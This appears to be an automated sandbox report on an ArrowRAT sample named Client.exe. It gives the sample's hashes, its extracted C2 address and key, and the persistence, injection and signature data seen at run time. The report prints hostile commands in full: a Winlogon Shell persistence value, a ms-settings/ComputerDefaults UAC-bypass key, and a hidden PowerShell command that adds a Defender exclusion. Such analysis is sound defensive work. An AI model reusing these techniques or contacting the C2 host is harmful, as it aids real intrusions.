Analysis
-
max time kernel
127s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
01-08-2024 11:18
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Client.exe
Resource
win10v2004-20240730-en
General
-
Target
Client.exe
-
Size
158KB
-
MD5
ed0eb58e701a62ef732db4bb2223565e
-
SHA1
882f556e08047535c88f33eb7a53652134d1081f
-
SHA256
01b5d985ba53c1d789b144694e179d04c8c0ff95e88659ce9e8b9b6e77f357ff
-
SHA512
f7395647176b2a3ff456eda2924bb2fa3fe507bacf93933bfb0588c03a7a87ab8b0339ca2f8b258a9acb7b5d68cd8aae948382251ea274e0dd8d81360890ced2
-
SSDEEP
3072:wbziH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPYdO8Y:wbzie0ODhTEPgnjuIJzo+PPcfPYQ8
Malware Config
Extracted
arrowrat
Client1
and-statements.gl.at.ply.gg:43442
JeaMEllZK
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Client.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Pan\\dora" Client.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 11 IoCs
Processes:
explorer.exeClient.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings Client.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Pan\\dora'" Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute Client.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command Client.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open Client.exe Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
Client.exepid process 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe 2764 Client.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
Client.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2764 Client.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe Token: SeShutdownPrivilege 2756 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
Processes:
explorer.exepid process 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
Processes:
explorer.exepid process 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe 2756 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Client.exepid process 2764 Client.exe -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
Client.exeexplorer.exedescription pid process target process PID 2764 wrote to memory of 2756 2764 Client.exe explorer.exe PID 2764 wrote to memory of 2756 2764 Client.exe explorer.exe PID 2764 wrote to memory of 2756 2764 Client.exe explorer.exe PID 2764 wrote to memory of 2672 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2672 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2672 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2672 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2688 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2688 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2688 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2688 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2972 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2972 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2972 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2972 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2788 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2788 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2788 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2788 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2696 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2696 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2696 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2696 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2568 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2568 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2568 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2568 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2852 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2852 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2852 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2852 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 1168 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 1168 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 1168 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 1168 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2680 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2680 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2680 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2680 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2776 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2776 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2776 2764 Client.exe cvtres.exe PID 2764 wrote to memory of 2776 2764 Client.exe cvtres.exe PID 2756 wrote to memory of 2916 2756 explorer.exe ctfmon.exe PID 2756 wrote to memory of 2916 2756 explorer.exe ctfmon.exe PID 2756 wrote to memory of 2916 2756 explorer.exe ctfmon.exe PID 2764 wrote to memory of 2700 2764 Client.exe ComputerDefaults.exe PID 2764 wrote to memory of 2700 2764 Client.exe ComputerDefaults.exe PID 2764 wrote to memory of 2700 2764 Client.exe ComputerDefaults.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2916
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:2672
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:2688
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:2972
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:2788
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:2696
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:2568
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:2852
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:1168
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:2680
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK2⤵PID:2776
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"2⤵PID:2700
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2756-9-0x00000000029C0000-0x00000000029D0000-memory.dmpFilesize
64KB
-
memory/2764-0-0x000007FEF5523000-0x000007FEF5524000-memory.dmpFilesize
4KB
-
memory/2764-1-0x0000000000CD0000-0x0000000000CFE000-memory.dmpFilesize
184KB
-
memory/2764-3-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmpFilesize
9.9MB
-
memory/2764-4-0x000007FEF5523000-0x000007FEF5524000-memory.dmpFilesize
4KB
-
memory/2764-5-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmpFilesize
9.9MB